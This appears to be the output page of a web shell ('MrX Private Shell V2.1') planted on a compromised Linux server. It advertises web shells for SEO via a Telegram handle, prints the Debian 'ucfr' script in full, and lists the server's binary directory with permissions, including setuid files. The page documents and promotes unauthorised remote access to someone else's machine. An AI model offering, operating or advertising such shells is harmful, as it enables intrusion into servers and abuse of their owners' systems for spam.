__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh # -*- Mode: Sh -*- # ucfr --- # Author : Manoj Srivastava ( [email protected] ) # Created On : Tue Apr 11 11:09:15 2006 # Created On Node : glaurung.internal.golden-gryphon.com # Last Modified By : Manoj Srivastava # Last Modified On : Tue Apr 11 13:50:58 2006 # Last Machine Used: glaurung.internal.golden-gryphon.com # Update Count : 43 # Status : Unknown, Use with caution! # HISTORY : # Description : # # Register a configuration file as belonging to a package # # arch-tag: 6e1d33fe-a930-41ce-8d0f-c87f87b19918 # # make sure we exit on error set -e # set the version and revision progname=$(basename "$0") pversion='Revision 3.00' ###################################################################### ######## ######### ######## Utility functions ######### ######## ######### ###################################################################### setq() { # Variable Value Doc_string if [ "x$2" = "x" ]; then echo >&2 "$progname: Unable to determine $3" exit 1; else if [ "x$VERBOSE" != "x" ]; then echo >&2 "$progname: $3 is $2"; fi eval "$1=\"\$2\""; fi } withecho () { echo "$@" >&2 "$@" } purge_from_registry () { if [ ! -e "$statedir/registry" ]; then echo >&2 "$progname: Internal error: $statedir/registry does not exist"; exit 6; fi if [ "$count" -eq 0 ]; then if [ "X$VERBOSE" != "X" ]; then echo >&2 "$progname: Association already purged. No changes."; fi exit 0; fi old_pkg=$(grep -E "[[:space:]]${real_conf_file_re}$" "$statedir/registry" | \ awk '{print $1;}' ); if [ "$pkg" != "$old_pkg" ]; then echo >&2 "ucfr: Association belongs to $old_pkg, not $pkg"; if [ "X$FORCE" = "X" ]; then echo >&2 "ucfr: Aborting"; exit 5; fi fi # OK, so we have something to purge. for i in $(/usr/bin/seq 6 -1 0); do if [ -e "${statedir}/registry.${i}" ]; then if [ "X$docmd" = "XYES" ]; then cp -f "${statedir}/registry.${i}" "${statedir}/registry.$(($i + 1))" else echo cp -f "${statedir}/registry.${i}" "${statedir}/registry.$(($i + 1))" fi fi done if [ "X$docmd" = "XYES" ]; then cp -f "$statedir/registry" "$statedir/registry.0" else echo cp -f "$statedir/registry" "$statedir/registry.0" fi if [ "X$docmd" = "XYES" ]; then set +e if [ "X$VERBOSE" != "X" ]; then echo "grep -Ev [[:space:]]${real_conf_file_re}$ $statedir/registry >\\" echo " $statedir/registry.tmp || true"; fi #echo "grep -Ev [[:space:]]${real_conf_file_re}$ $statedir/registry" grep -Ev "[[:space:]]${real_conf_file_re}$" "$statedir/registry" > \ "$statedir/registry.tmp" || true; if [ "X$docmd" = "XYES" ]; then mv -f "$statedir/registry.tmp" "$statedir/registry" else echo mv -f "$statedir/registry.tmp" "$statedir/registry" fi set -e fi } replace_in_registry () { if [ ! -e "$statedir/registry" ]; then echo >&2 "$progname: Internal error: $statedir/registry does not exist"; exit 6; fi if [ "$count" -eq 1 ]; then old_pkg=$(grep -E "[[:space:]]${real_conf_file_re}$" "$statedir/registry" | \ awk '{print $1;}' ); if [ "$pkg" != "$old_pkg" ]; then divert_package=$(dpkg-divert --listpackage "$conf_file") if [ -n "$divert_package" ]; then if [ "X$VERBOSE" != "X" ]; then echo >&2 "$progname: Package $pkg will not take away diverted ${conf_file} from package $divert_package"; fi exit 0; else if [ "X$FORCE" = "X" ]; then echo >&2 "$progname: Attempt from package $pkg to take ${real_conf_file} away from package $old_pkg"; echo >&2 "ucfr: Aborting."; exit 4; fi fi else if [ "X$VERBOSE" != "X" ]; then echo >&2 "$progname: Association already recorded. No changes."; fi exit 0; fi fi for i in $(/usr/bin/seq 6 -1 0); do if [ -e "${statedir}/registry.${i}" ]; then if [ "X$docmd" = "XYES" ]; then cp -f "${statedir}/registry.${i}" \ "${statedir}/registry.$(($i + 1))" else echo cp -f "${statedir}/registry.${i}" \ "${statedir}/registry.$(($i + 1))" fi fi done if [ "X$docmd" = "XYES" ]; then cp -f "$statedir/registry" "$statedir/registry.0" else echo cp -f "$statedir/registry" "$statedir/registry.0" fi if [ "X$docmd" = "XYES" ]; then set +e if [ "X$VERBOSE" != "X" ]; then echo "grep -Ev \"[[:space:]]${real_conf_file_re}$\" \"$statedir/registry\" \\" echo " $statedir/registry.tmp || true" echo "echo \"$pkg $real_conf_file\" >> \"$statedir/registry.tmp\"" echo "mv -f $statedir/registry.tmp $statedir/registry" fi grep -Ev "[[:space:]]${real_conf_file_re}$" "$statedir/registry" > \ "$statedir/registry.tmp" || true; echo "$pkg $real_conf_file" >> "$statedir/registry.tmp"; mv -f "$statedir/registry.tmp" "$statedir/registry" set -e else echo "grep -Ev \"[[:space:]]${real_conf_file_re}$\" \"$statedir/registry\" \\" echo " $statedir/registry.tmp || true" echo "echo \"$pkg $real_conf_file\" >> \"$statedir/registry.tmp\"" echo "mv -f $statedir/registry.tmp $statedir/registry" fi } usageversion () { cat >&2 <<END Debian GNU/Linux $progname $pversion. Copyright (C) 2002-2006 Manoj Srivastava. This is free software; see the GNU General Public Licence for copying conditions. There is NO warranty. Usage: $progname [options] package_name path_for_configuration_file Options: -h, --help print this message -f --force Force the association, even if another package used to own the configuration file. -d [n], --debug [n] Set the Debug level to N -n, --no-action Dry run. No action is actually taken. -v, --verbose Make the script verbose -p, --purge Remove any reference to the package/file association from the records --state-dir bar Set the state directory to bar instead of the default '/var/lib/ucf'. Used mostly for testing. END } ###################################################################### ######## ######### ######## Command line args ######### ######## ######### ###################################################################### # # Long term variables# # docmd='YES' action='withecho' action= DEBUG=0 VERBOSE='' statedir='/var/lib/ucf'; THREEWAY= # Note that we use `"$@"' to let each command-line parameter expand to a # separate word. The quotes around `$@' are essential! # We need TEMP as the `eval set --' would nuke the return value of getopt. TEMP=$(getopt -a -o hd::D::fnvp -n "$progname" \ --long help,debug::,DEBUG::,force,no-action,purge,verbose,state-dir: \ -- "$@") if [ $? != 0 ] ; then echo "Error handling options.Terminating..." >&2 ; exit 1 ; fi # Note the quotes around `$TEMP': they are essential! eval set -- "$TEMP" while true ; do case "$1" in -h|--help) usageversion; exit 0 ;; -n|--no-action) action='echo'; docmd='NO'; shift ;; -v|--verbose) VERBOSE=1; shift ;; -f|--force) FORCE=1; shift ;; --state-dir) opt_state_dir="$2"; shift 2 ;; -D|-d|--debug|--DEBUG) # d has an optional argument. As we are in quoted mode, # an empty parameter will be generated if its optional # argument is not found. case "$2" in "") setq DEBUG 1 "The Debug value"; shift 2 ;; *) setq DEBUG "$2" "The Debug value"; shift 2 ;; esac ;; -p|--purge) PURGE=YES; shift ;; --) shift ; break ;; *) echo >&2 "$progname: Internal error!" ; exit 1 ;; esac done # Need to run as root, or else the if test "$(id -u)" != 0; then if [ "$docmd" = "YES" ]; then echo "$progname: Need to be run as root." >&2 echo "$progname: Setting up no action mode." >&2 action='echo'; docmd='NO'; fi fi if [ $# != 2 ]; then echo >&2 "$progname: *** ERROR: Need exactly two arguments, got $#"; echo >&2 "" usageversion; exit 3 ; fi # We have here a configuration file, which can be a symlink, and may # contain characters that are unsafe in regular expressions setq pkg "$1" "The Package name"; setq conf_file "$2" "The Configuration file"; setq real_conf_file "$(readlink -q -m $conf_file)" "The (real) Configuration file"; pkg_re="$(echo $pkg | sed -e 's,+,\\+,')" conf_file_re="$(echo $conf_file | sed -e 's,+,\\+,')" real_conf_file_re="$(echo $real_conf_file | sed -e 's,+,\\+,')" case $conf_file_re in /*) : echo fine ;; *) echo >&2 "$progname: Need a fully qualified path for the file \"$conf_file\"" # Don't exit with an error for etch' exit 0; esac # Load site defaults and over rides. if [ -f /etc/ucf.conf ]; then . /etc/ucf.conf fi # Command line, env variable, config file, or default if [ ! "x$opt_state_dir" = "x" ]; then setq statedir "$opt_state_dir" "The State directory" elif [ ! "x$UCF_STATE_DIR" = "x" ]; then setq statedir "$UCF_STATE_DIR" "The State directory" elif [ ! "x$conf_state_dir" = "x" ]; then setq statedir "$conf_state_dir" "The State directory" else setq statedir '/var/lib/ucf' "The State directory" fi # VERBOSE of 0 is supposed to be the same as not setting VERBOSE if [ "X$VERBOSE" = "X0" ]; then VERBOSE='' fi # if [ -e "$statedir/registry" -a ! -w "$statedir/registry" ]; then echo >&2 "$progname: do not have write privilege to the registry data" if [ "X$docmd" = "XYES" ]; then exit 1; fi fi # test and see if this file exists in the database if [ ! -d "$statedir" ]; then $action mkdir -p "$statedir" fi if [ ! -f "$statedir/registry" ]; then $action touch "$statedir/registry" fi if [ "X$VERBOSE" != "X" ]; then echo >&2 "$progname: The registry exists" fi # sanity check count=$(grep -E --count "[[:space:]]${real_conf_file_re}$" "$statedir/registry") || true if [ "$count" -ge 2 ]; then echo >&2 "$progname: Corrupt registry: Duplicate entries for ${conf_file}"; grep -E "[[:space:]]${real_conf_file_re}$" "$statedir/registry"; exit "$count"; fi if [ "X$PURGE" != "X" ]; then $action purge_from_registry else $action replace_in_registry fi exit 0;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| [ | File | 54.44 KB | 0755 |
|
| aa-enabled | File | 18.3 KB | 0755 |
|
| aa-exec | File | 18.3 KB | 0755 |
|
| aa-features-abi | File | 18.3 KB | 0755 |
|
| addpart | File | 14.38 KB | 0755 |
|
| arch | File | 34.51 KB | 0755 |
|
| awk | File | 166.77 KB | 0755 |
|
| b2sum | File | 54.51 KB | 0755 |
|
| base32 | File | 38.51 KB | 0755 |
|
| base64 | File | 38.51 KB | 0755 |
|
| basename | File | 34.51 KB | 0755 |
|
| basenc | File | 46.51 KB | 0755 |
|
| bash | File | 1.38 MB | 0755 |
|
| bashbug | File | 6.82 KB | 0755 |
|
| bunzip2 | File | 38.38 KB | 0755 |
|
| busctl | File | 94.59 KB | 0755 |
|
| bzcat | File | 38.38 KB | 0755 |
|
| bzcmp | File | 2.17 KB | 0755 |
|
| bzdiff | File | 2.17 KB | 0755 |
|
| bzegrep | File | 3.69 KB | 0755 |
|
| bzexe | File | 4.78 KB | 0755 |
|
| bzfgrep | File | 3.69 KB | 0755 |
|
| bzgrep | File | 3.69 KB | 0755 |
|
| bzip2 | File | 38.38 KB | 0755 |
|
| bzip2recover | File | 18.3 KB | 0755 |
|
| bzless | File | 1.27 KB | 0755 |
|
| bzmore | File | 1.27 KB | 0755 |
|
| captoinfo | File | 90.41 KB | 0755 |
|
| cat | File | 38.46 KB | 0755 |
|
| chage | File | 70.49 KB | 2755 |
|
| chardet | File | 221 B | 0755 |
|
| chardetect | File | 221 B | 0755 |
|
| chattr | File | 14.31 KB | 0755 |
|
| chcon | File | 58.51 KB | 0755 |
|
| chfn | File | 71.09 KB | 4755 |
|
| chgrp | File | 58.51 KB | 0755 |
|
| chmod | File | 54.51 KB | 0755 |
|
| choom | File | 22.38 KB | 0755 |
|
| chown | File | 58.51 KB | 0755 |
|
| chrt | File | 30.38 KB | 0755 |
|
| chsh | File | 43.71 KB | 4755 |
|
| cksum | File | 102.52 KB | 0755 |
|
| clear | File | 14.31 KB | 0755 |
|
| clear_console | File | 14.23 KB | 0755 |
|
| cloud-id | File | 966 B | 0755 |
|
| cloud-init | File | 970 B | 0755 |
|
| cloud-init-per | File | 2.06 KB | 0755 |
|
| cmp | File | 42.39 KB | 0755 |
|
| comm | File | 38.52 KB | 0755 |
|
| core-sshd-host-keygen | File | 1.49 KB | 0755 |
|
| coredumpctl | File | 82.66 KB | 0755 |
|
| cp | File | 138.52 KB | 0755 |
|
| csplit | File | 50.51 KB | 0755 |
|
| ctstat | File | 22.66 KB | 0755 |
|
| cut | File | 38.51 KB | 0755 |
|
| cvtsudoers | File | 321.1 KB | 0755 |
|
| dash | File | 126.74 KB | 0755 |
|
| date | File | 106.51 KB | 0755 |
|
| dbus-cleanup-sockets | File | 14.29 KB | 0755 |
|
| dbus-daemon | File | 230.64 KB | 0755 |
|
| dbus-monitor | File | 26.3 KB | 0755 |
|
| dbus-run-session | File | 14.3 KB | 0755 |
|
| dbus-send | File | 30.29 KB | 0755 |
|
| dbus-update-activation-environment | File | 14.29 KB | 0755 |
|
| dbus-uuidgen | File | 14.29 KB | 0755 |
|
| dd | File | 70.54 KB | 0755 |
|
| delpart | File | 14.38 KB | 0755 |
|
| df | File | 87.08 KB | 0755 |
|
| diff | File | 134.55 KB | 0755 |
|
| diff3 | File | 58.52 KB | 0755 |
|
| dir | File | 138.98 KB | 0755 |
|
| dircolors | File | 46.52 KB | 0755 |
|
| dirname | File | 34.38 KB | 0755 |
|
| dmesg | File | 68.64 KB | 0755 |
|
| dnsdomainname | File | 22.23 KB | 0755 |
|
| domainname | File | 22.23 KB | 0755 |
|
| dpkg-deb | File | 142.58 KB | 0755 |
|
| dpkg-realpath | File | 4.09 KB | 0755 |
|
| du | File | 98.51 KB | 0755 |
|
| ec2metadata | File | 8.38 KB | 0755 |
|
| echo | File | 34.38 KB | 0755 |
|
| editor | File | 1.66 MB | 0755 |
|
| egrep | File | 41 B | 0755 |
|
| env | File | 46.95 KB | 0755 |
|
| ex | File | 1.66 MB | 0755 |
|
| expand | File | 34.53 KB | 0755 |
|
| expiry | File | 26.52 KB | 2755 |
|
| expr | File | 42.41 KB | 0755 |
|
| factor | File | 62.51 KB | 0755 |
|
| faillog | File | 22.63 KB | 0755 |
|
| fallocate | File | 26.38 KB | 0755 |
|
| false | File | 26.3 KB | 0755 |
|
| fgrep | File | 41 B | 0755 |
|
| finalrd | File | 2.06 KB | 0755 |
|
| find | File | 199.48 KB | 0755 |
|
| findmnt | File | 67.66 KB | 0755 |
|
| flock | File | 22.48 KB | 0755 |
|
| fmt | File | 38.51 KB | 0755 |
|
| fold | File | 34.51 KB | 0755 |
|
| free | File | 26.38 KB | 0755 |
|
| gdbserver | File | 615.98 KB | 0755 |
|
| getconf | File | 26.36 KB | 0755 |
|
| getent | File | 38.72 KB | 0755 |
|
| getopt | File | 22.38 KB | 0755 |
|
| gpasswd | File | 74.46 KB | 4755 |
|
| gpgv | File | 303.14 KB | 0755 |
|
| grep | File | 182.45 KB | 0755 |
|
| groups | File | 34.51 KB | 0755 |
|
| growpart | File | 29.19 KB | 0755 |
|
| gunzip | File | 2.29 KB | 0755 |
|
| gzexe | File | 6.3 KB | 0755 |
|
| gzip | File | 91.23 KB | 0755 |
|
| hardlink | File | 46.48 KB | 0755 |
|
| head | File | 42.51 KB | 0755 |
|
| hostid | File | 34.51 KB | 0755 |
|
| hostname | File | 22.23 KB | 0755 |
|
| hostnamectl | File | 30.45 KB | 0755 |
|
| i386 | File | 26.65 KB | 0755 |
|
| iconv | File | 66.48 KB | 0755 |
|
| id | File | 38.51 KB | 0755 |
|
| infocmp | File | 66.38 KB | 0755 |
|
| infotocap | File | 90.41 KB | 0755 |
|
| install | File | 142.52 KB | 0755 |
|
| ionice | File | 18.38 KB | 0755 |
|
| ip | File | 754.8 KB | 0755 |
|
| ipcmk | File | 22.45 KB | 0755 |
|
| ipcrm | File | 18.38 KB | 0755 |
|
| ipcs | File | 38.38 KB | 0755 |
|
| iptables-xml | File | 92.95 KB | 0755 |
|
| ischroot | File | 14.48 KB | 0755 |
|
| join | File | 50.55 KB | 0755 |
|
| journalctl | File | 78.91 KB | 0755 |
|
| json-patch-jsondiff | File | 1004 B | 0755 |
|
| jsondiff | File | 1004 B | 0755 |
|
| jsonpatch | File | 3.77 KB | 0755 |
|
| jsonpointer | File | 1.79 KB | 0755 |
|
| jsonschema | File | 213 B | 0755 |
|
| kernel-install | File | 54.67 KB | 0755 |
|
| kill | File | 22.38 KB | 0755 |
|
| kmod | File | 170.24 KB | 0755 |
|
| kmodsign | File | 18.45 KB | 0755 |
|
| last | File | 34.38 KB | 0755 |
|
| lastb | File | 34.38 KB | 0755 |
|
| lastlog | File | 27.79 KB | 0755 |
|
| lcf | File | 7.6 KB | 0755 |
|
| ld.so | File | 231.07 KB | 0755 |
|
| ldd | File | 5.26 KB | 0755 |
|
| less | File | 190.38 KB | 0755 |
|
| lessecho | File | 14.31 KB | 0755 |
|
| lessfile | File | 8.83 KB | 0755 |
|
| lesskey | File | 23.7 KB | 0755 |
|
| lesspipe | File | 8.83 KB | 0755 |
|
| link | File | 34.51 KB | 0755 |
|
| linux32 | File | 26.65 KB | 0755 |
|
| linux64 | File | 26.65 KB | 0755 |
|
| ln | File | 54.51 KB | 0755 |
|
| lnstat | File | 22.66 KB | 0755 |
|
| locale | File | 49.63 KB | 0755 |
|
| locale-check | File | 14.15 KB | 0755 |
|
| localectl | File | 26.45 KB | 0755 |
|
| localedef | File | 319.09 KB | 0755 |
|
| logger | File | 38.97 KB | 0755 |
|
| login | File | 51.81 KB | 0755 |
|
| loginctl | File | 66.58 KB | 0755 |
|
| logname | File | 34.51 KB | 0755 |
|
| ls | File | 138.98 KB | 0755 |
|
| lsattr | File | 14.31 KB | 0755 |
|
| lsblk | File | 146.38 KB | 0755 |
|
| lscpu | File | 110.38 KB | 0755 |
|
| lsipc | File | 50.38 KB | 0755 |
|
| lslocks | File | 30.77 KB | 0755 |
|
| lslogins | File | 50.38 KB | 0755 |
|
| lsmem | File | 38.38 KB | 0755 |
|
| lsmod | File | 170.24 KB | 0755 |
|
| lsns | File | 42.38 KB | 0755 |
|
| man | File | 128 B | 0755 |
|
| mawk | File | 166.77 KB | 0755 |
|
| mcookie | File | 26.45 KB | 0755 |
|
| md5sum | File | 38.41 KB | 0755 |
|
| md5sum.textutils | File | 38.41 KB | 0755 |
|
| mesg | File | 14.38 KB | 0755 |
|
| mkdir | File | 74.51 KB | 0755 |
|
| mkfifo | File | 42.51 KB | 0755 |
|
| mknod | File | 42.51 KB | 0755 |
|
| mksquashfs | File | 286.95 KB | 0755 |
|
| mkswapfile | File | 865 B | 0755 |
|
| mktemp | File | 34.51 KB | 0755 |
|
| more | File | 46.38 KB | 0755 |
|
| mount | File | 50.38 KB | 4755 |
|
| mountpoint | File | 18.38 KB | 0755 |
|
| mv | File | 134.52 KB | 0755 |
|
| namei | File | 22.38 KB | 0755 |
|
| nawk | File | 166.77 KB | 0755 |
|
| nc | File | 38.63 KB | 0755 |
|
| nc.openbsd | File | 38.63 KB | 0755 |
|
| netcat | File | 38.63 KB | 0755 |
|
| networkctl | File | 122.58 KB | 0755 |
|
| newgrp | File | 39.71 KB | 4755 |
|
| nice | File | 34.51 KB | 0755 |
|
| nisdomainname | File | 22.23 KB | 0755 |
|
| nl | File | 38.6 KB | 0755 |
|
| nohup | File | 34.41 KB | 0755 |
|
| nproc | File | 34.51 KB | 0755 |
|
| nsenter | File | 30.6 KB | 0755 |
|
| nstat | File | 30.38 KB | 0755 |
|
| numfmt | File | 58.54 KB | 0755 |
|
| od | File | 70.51 KB | 0755 |
|
| openssl | File | 981.8 KB | 0755 |
|
| p11-kit | File | 206.7 KB | 0755 |
|
| p11tool | File | 218.38 KB | 0755 |
|
| pager | File | 190.38 KB | 0755 |
|
| partx | File | 62.38 KB | 0755 |
|
| passwd | File | 62.65 KB | 4755 |
|
| paste | File | 38.41 KB | 0755 |
|
| pathchk | File | 34.51 KB | 0755 |
|
| pdb3 | File | 67.83 KB | 0755 |
|
| pdb3.12 | File | 67.83 KB | 0755 |
|
| pgrep | File | 34.47 KB | 0755 |
|
| pidof | File | 26.23 KB | 0755 |
|
| pidwait | File | 34.47 KB | 0755 |
|
| ping | File | 87.7 KB | 0755 |
|
| ping4 | File | 87.7 KB | 0755 |
|
| ping6 | File | 87.7 KB | 0755 |
|
| pinky | File | 38.41 KB | 0755 |
|
| pkaction | File | 18.3 KB | 0755 |
|
| pkcheck | File | 22.3 KB | 0755 |
|
| pkcs11-tool | File | 184.61 KB | 0755 |
|
| pkill | File | 34.47 KB | 0755 |
|
| pkttyagent | File | 22.3 KB | 0755 |
|
| pldd | File | 22.44 KB | 0755 |
|
| plymouth | File | 46.3 KB | 0755 |
|
| pmap | File | 34.4 KB | 0755 |
|
| pr | File | 70.58 KB | 0755 |
|
| printenv | File | 34.38 KB | 0755 |
|
| printf | File | 54.44 KB | 0755 |
|
| prlimit | File | 26.89 KB | 0755 |
|
| ps | File | 142.99 KB | 0755 |
|
| ptx | File | 54.54 KB | 0755 |
|
| pwd | File | 34.51 KB | 0755 |
|
| pwdx | File | 14.38 KB | 0755 |
|
| py3clean | File | 7.63 KB | 0755 |
|
| py3compile | File | 13 KB | 0755 |
|
| py3versions | File | 12.52 KB | 0755 |
|
| pydoc3 | File | 80 B | 0755 |
|
| pydoc3.12 | File | 80 B | 0755 |
|
| pygettext3 | File | 23.66 KB | 0755 |
|
| pygettext3.12 | File | 23.66 KB | 0755 |
|
| pyserial-miniterm | File | 975 B | 0755 |
|
| pyserial-ports | File | 969 B | 0755 |
|
| python3 | File | 7.65 MB | 0755 |
|
| python3.12 | File | 7.65 MB | 0755 |
|
| rbash | File | 1.38 MB | 0755 |
|
| rdma | File | 102.52 KB | 0755 |
|
| readlink | File | 42.41 KB | 0755 |
|
| realpath | File | 42.41 KB | 0755 |
|
| rename.ul | File | 22.38 KB | 0755 |
|
| renice | File | 14.38 KB | 0755 |
|
| reset | File | 26.31 KB | 0755 |
|
| resizepart | File | 22.38 KB | 0755 |
|
| resolvectl | File | 158.67 KB | 0755 |
|
| rev | File | 14.38 KB | 0755 |
|
| rgrep | File | 30 B | 0755 |
|
| rm | File | 58.51 KB | 0755 |
|
| rmdir | File | 46.41 KB | 0755 |
|
| routel | File | 1.62 KB | 0755 |
|
| rtstat | File | 22.66 KB | 0755 |
|
| run-parts | File | 26.82 KB | 0755 |
|
| runcon | File | 34.51 KB | 0755 |
|
| rview | File | 1.66 MB | 0755 |
|
| savelog | File | 10.24 KB | 0755 |
|
| sbattach | File | 22.54 KB | 0755 |
|
| sbkeysync | File | 34.74 KB | 0755 |
|
| sbsiglist | File | 14.6 KB | 0755 |
|
| sbsign | File | 34.7 KB | 0755 |
|
| sbvarsign | File | 22.73 KB | 0755 |
|
| sbverify | File | 30.61 KB | 0755 |
|
| scp | File | 134.59 KB | 0755 |
|
| script | File | 54.38 KB | 0755 |
|
| scriptlive | File | 42.38 KB | 0755 |
|
| scriptreplay | File | 34.38 KB | 0755 |
|
| sdiff | File | 50.39 KB | 0755 |
|
| sed | File | 110.57 KB | 0755 |
|
| select-editor | File | 2.39 KB | 0755 |
|
| sensible-browser | File | 1.55 KB | 0755 |
|
| sensible-editor | File | 1.52 KB | 0755 |
|
| sensible-pager | File | 921 B | 0755 |
|
| sensible-terminal | File | 1.15 KB | 0755 |
|
| seq | File | 50.51 KB | 0755 |
|
| setarch | File | 26.65 KB | 0755 |
|
| setpriv | File | 38.38 KB | 0755 |
|
| setsid | File | 14.38 KB | 0755 |
|
| setterm | File | 34.38 KB | 0755 |
|
| sftp | File | 150.66 KB | 0755 |
|
| sg | File | 39.71 KB | 4755 |
|
| sh | File | 126.74 KB | 0755 |
|
| sha1sum | File | 38.41 KB | 0755 |
|
| sha224sum | File | 38.41 KB | 0755 |
|
| sha256sum | File | 38.41 KB | 0755 |
|
| sha384sum | File | 38.41 KB | 0755 |
|
| sha512sum | File | 38.41 KB | 0755 |
|
| shred | File | 54.51 KB | 0755 |
|
| shuf | File | 46.51 KB | 0755 |
|
| skill | File | 26.41 KB | 0755 |
|
| slabtop | File | 22.44 KB | 0755 |
|
| sleep | File | 34.51 KB | 0755 |
|
| slogin | File | 827.04 KB | 0755 |
|
| snap | File | 21.57 MB | 0755 |
|
| File | 0 B | 0 |
|
|
| snice | File | 26.41 KB | 0755 |
|
| sort | File | 102.8 KB | 0755 |
|
| splash-client | File | 404 B | 0755 |
|
| split | File | 54.94 KB | 0755 |
|
| sqfscat | File | 147.9 KB | 0755 |
|
| sqfstar | File | 286.95 KB | 0755 |
|
| ss | File | 129.07 KB | 0755 |
|
| ssh | File | 827.04 KB | 0755 |
|
| ssh-add | File | 294.42 KB | 0755 |
|
| ssh-agent | File | 302.43 KB | 2755 |
|
| ssh-argv0 | File | 1.42 KB | 0755 |
|
| ssh-copy-id | File | 12.77 KB | 0755 |
|
| ssh-keygen | File | 442.44 KB | 0755 |
|
| ssh-keyscan | File | 330.44 KB | 0755 |
|
| stat | File | 86.52 KB | 0755 |
|
| stdbuf | File | 50.51 KB | 0755 |
|
| stty | File | 78.52 KB | 0755 |
|
| su | File | 54.38 KB | 4755 |
|
| sudo | File | 271.42 KB | 4755 |
|
| sudoedit | File | 271.42 KB | 4755 |
|
| sudoreplay | File | 95.95 KB | 0755 |
|
| sum | File | 34.41 KB | 0755 |
|
| sync | File | 34.41 KB | 0755 |
|
| systemctl | File | 1.43 MB | 0755 |
|
| systemd | File | 98.45 KB | 0755 |
|
| systemd-ac-power | File | 14.45 KB | 0755 |
|
| systemd-analyze | File | 198.85 KB | 0755 |
|
| systemd-ask-password | File | 18.58 KB | 0755 |
|
| systemd-cat | File | 18.45 KB | 0755 |
|
| systemd-cgls | File | 22.57 KB | 0755 |
|
| systemd-cgtop | File | 38.47 KB | 0755 |
|
| systemd-confext | File | 54.64 KB | 0755 |
|
| systemd-creds | File | 42.72 KB | 0755 |
|
| systemd-cryptenroll | File | 70.92 KB | 0755 |
|
| systemd-cryptsetup | File | 78.95 KB | 0755 |
|
| systemd-delta | File | 26.45 KB | 0755 |
|
| systemd-detect-virt | File | 18.45 KB | 0755 |
|
| systemd-escape | File | 22.45 KB | 0755 |
|
| systemd-firstboot | File | 58.82 KB | 0755 |
|
| systemd-hwdb | File | 154.74 KB | 0755 |
|
| systemd-id128 | File | 22.45 KB | 0755 |
|
| systemd-inhibit | File | 22.47 KB | 0755 |
|
| systemd-machine-id-setup | File | 18.63 KB | 0755 |
|
| systemd-mount | File | 50.78 KB | 0755 |
|
| systemd-notify | File | 26.66 KB | 0755 |
|
| systemd-path | File | 18.45 KB | 0755 |
|
| systemd-repart | File | 195.23 KB | 0755 |
|
| systemd-run | File | 66.79 KB | 0755 |
|
| systemd-socket-activate | File | 30.45 KB | 0755 |
|
| systemd-stdio-bridge | File | 22.45 KB | 0755 |
|
| systemd-sysext | File | 54.64 KB | 0755 |
|
| systemd-sysusers | File | 66.63 KB | 0755 |
|
| systemd-tmpfiles | File | 114.7 KB | 0755 |
|
| systemd-tty-ask-password-agent | File | 34.45 KB | 0755 |
|
| systemd-umount | File | 50.78 KB | 0755 |
|
| tabs | File | 18.3 KB | 0755 |
|
| tac | File | 38.41 KB | 0755 |
|
| tail | File | 62.53 KB | 0755 |
|
| tar | File | 421.92 KB | 0755 |
|
| taskset | File | 30.38 KB | 0755 |
|
| tee | File | 38.51 KB | 0755 |
|
| tempfile | File | 14.3 KB | 0755 |
|
| test | File | 46.44 KB | 0755 |
|
| tic | File | 90.41 KB | 0755 |
|
| timedatectl | File | 815 B | 0755 |
|
| timedatectl.real | File | 46.45 KB | 0755 |
|
| timeout | File | 38.95 KB | 0755 |
|
| tload | File | 22.39 KB | 0755 |
|
| toe | File | 22.3 KB | 0755 |
|
| top | File | 131.7 KB | 0755 |
|
| touch | File | 94.51 KB | 0755 |
|
| tput | File | 26.34 KB | 0755 |
|
| tr | File | 46.51 KB | 0755 |
|
| true | File | 26.3 KB | 0755 |
|
| truncate | File | 38.51 KB | 0755 |
|
| tset | File | 26.31 KB | 0755 |
|
| tsort | File | 46.51 KB | 0755 |
|
| tty | File | 34.51 KB | 0755 |
|
| tzselect | File | 15.02 KB | 0755 |
|
| ucf | File | 40.68 KB | 0755 |
|
| ucfr | File | 10.85 KB | 0755 |
|
| uclampset | File | 30.38 KB | 0755 |
|
| udevadm | File | 1.37 MB | 0755 |
|
| umount | File | 38.38 KB | 4755 |
|
| uname | File | 34.51 KB | 0755 |
|
| uncompress | File | 2.29 KB | 0755 |
|
| unexpand | File | 38.53 KB | 0755 |
|
| uniq | File | 38.51 KB | 0755 |
|
| unlink | File | 34.51 KB | 0755 |
|
| unshare | File | 42.6 KB | 0755 |
|
| unsquashfs | File | 147.9 KB | 0755 |
|
| update-alternatives | File | 58.38 KB | 0755 |
|
| uptime | File | 14.38 KB | 0755 |
|
| users | File | 34.51 KB | 0755 |
|
| utmpdump | File | 22.38 KB | 0755 |
|
| varlinkctl | File | 30.45 KB | 0755 |
|
| vcs-run | File | 6.75 KB | 0755 |
|
| vdir | File | 138.98 KB | 0755 |
|
| vi | File | 1.66 MB | 0755 |
|
| view | File | 1.66 MB | 0755 |
|
| vim.tiny | File | 1.66 MB | 0755 |
|
| vmstat | File | 38.78 KB | 0755 |
|
| w | File | 26.38 KB | 0755 |
|
| wall | File | 22.38 KB | 0755 |
|
| watch | File | 30.84 KB | 0755 |
|
| wc | File | 54.52 KB | 0755 |
|
| wdctl | File | 34.4 KB | 0755 |
|
| whereis | File | 30.84 KB | 0755 |
|
| which | File | 1.05 KB | 0755 |
|
| which.debianutils | File | 1.05 KB | 0755 |
|
| who | File | 58.52 KB | 0755 |
|
| whoami | File | 34.51 KB | 0755 |
|
| wpa_passphrase | File | 14.38 KB | 0755 |
|
| x86_64 | File | 26.65 KB | 0755 |
|
| xargs | File | 62.41 KB | 0755 |
|
| xdg-email | File | 38 B | 0755 |
|
| xdg-open | File | 38 B | 0755 |
|
| xdg-settings | File | 1.68 KB | 0755 |
|
| yes | File | 34.38 KB | 0755 |
|
| ypdomainname | File | 22.23 KB | 0755 |
|
| zcat | File | 1.94 KB | 0755 |
|
| zcmp | File | 1.64 KB | 0755 |
|
| zdiff | File | 6.31 KB | 0755 |
|
| zdump | File | 30.28 KB | 0755 |
|
| zegrep | File | 29 B | 0755 |
|
| zfgrep | File | 29 B | 0755 |
